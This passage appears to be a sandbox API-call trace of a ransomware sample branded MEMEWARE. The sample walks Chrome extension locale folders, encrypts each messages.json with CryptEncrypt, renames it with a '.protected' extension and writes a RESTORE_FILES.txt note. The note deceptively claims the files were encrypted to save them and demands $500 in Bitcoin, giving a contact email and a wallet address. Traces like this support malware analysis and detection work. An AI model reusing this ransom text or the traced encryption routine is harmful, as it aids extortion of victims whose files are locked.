out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\.") returned 143 [0080.704] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.704] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.704] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.704] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.704] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.704] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.704] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.704] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\..") returned 144 [0080.704] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.704] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.704] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.704] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.704] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.704] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.704] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.704] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.704] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json") 
returned 155 [0080.704] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.704] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.704] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.704] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.704] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.705] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json") returned 155 [0080.705] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.705] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json") returned 155 [0080.705] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.705] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json") returned 155 [0080.705] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.705] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xc4, lpOverlapped=0x0) returned 1 [0080.706] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff3c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.706] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xc4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xc4, lpOverlapped=0x0) returned 1 [0080.706] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.706] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.706] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.706] CloseHandle (hObject=0x168) returned 1 [0080.706] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json.protected") returned 165 [0080.706] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json.protected")) returned 1 [0080.707] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.707] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.707] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\RESTORE_FILES.txt") returned 159 [0080.707] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.707] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.707] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.708] lstrlenA (lpString="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") returned 684 [0080.708] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.708] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.708] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0080.708] CloseHandle (hObject=0x164) returned 1 [0080.708] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.708] lstrcmpiW (lpString1="ta", lpString2="Windows") returned -1 [0080.708] lstrcmpiW (lpString1="ta", lpString2="Program Files") returned 1 [0080.708] lstrcmpiW (lpString1="ta", lpString2="Program Files (x86)") returned 1 [0080.708] lstrcmpiW (lpString1="ta", lpString2="$Recycle.bin") returned 1 [0080.708] lstrcmpiW (lpString1="ta", lpString2="System Volume Information") returned 1 [0080.708] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta") returned 141 [0080.709] lstrcmpW (lpString1="ta", lpString2=".") returned 1 [0080.709] lstrcmpW (lpString1="ta", lpString2="..") returned 1 [0080.709] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\*") returned 143 [0080.709] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.709] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.709] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.709] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.709] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.709] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.709] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | 
out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\.") returned 143 [0080.709] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.709] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.709] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.709] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.709] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.709] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.709] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.709] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\..") returned 144 [0080.709] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.709] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.709] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.709] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.709] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.709] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.709] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.709] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.709] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json") 
returned 155 [0080.709] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.710] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.710] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.710] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.710] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.710] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json") returned 155 [0080.710] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.710] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json") returned 155 [0080.710] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.710] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json") returned 155 [0080.710] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.710] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x150, lpOverlapped=0x0) returned 1 [0080.711] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffeb0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.711] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x150, lpOverlapped=0x0) returned 1 [0080.711] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.711] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.711] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.711] CloseHandle (hObject=0x168) returned 1 [0080.711] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json.protected") returned 165 [0080.711] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\messages.json.protected")) returned 1 [0080.712] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.712] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.712] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\RESTORE_FILES.txt") returned 159 [0080.712] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ta\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.712] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.712] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.713] lstrlenA (lpString="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") returned 684 [0080.713] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.713] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.713] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0080.713] CloseHandle (hObject=0x164) returned 1 [0080.713] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.713] lstrcmpiW (lpString1="te", lpString2="Windows") returned -1 [0080.713] lstrcmpiW (lpString1="te", lpString2="Program Files") returned 1 [0080.714] lstrcmpiW (lpString1="te", lpString2="Program Files (x86)") returned 1 [0080.714] lstrcmpiW (lpString1="te", lpString2="$Recycle.bin") returned 1 [0080.714] lstrcmpiW (lpString1="te", lpString2="System Volume Information") returned 1 [0080.714] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te") returned 141 [0080.714] lstrcmpW (lpString1="te", lpString2=".") returned 1 [0080.714] lstrcmpW (lpString1="te", lpString2="..") returned 1 [0080.714] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\*") returned 143 [0080.714] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.714] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.714] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.714] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.714] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.714] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.715] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | 
out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\.") returned 143 [0080.715] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.715] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.715] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.715] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.715] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.715] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.715] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.715] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\..") returned 144 [0080.715] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.715] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.715] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.715] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.715] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.715] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.715] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.715] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.715] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\te\\messages.json") 
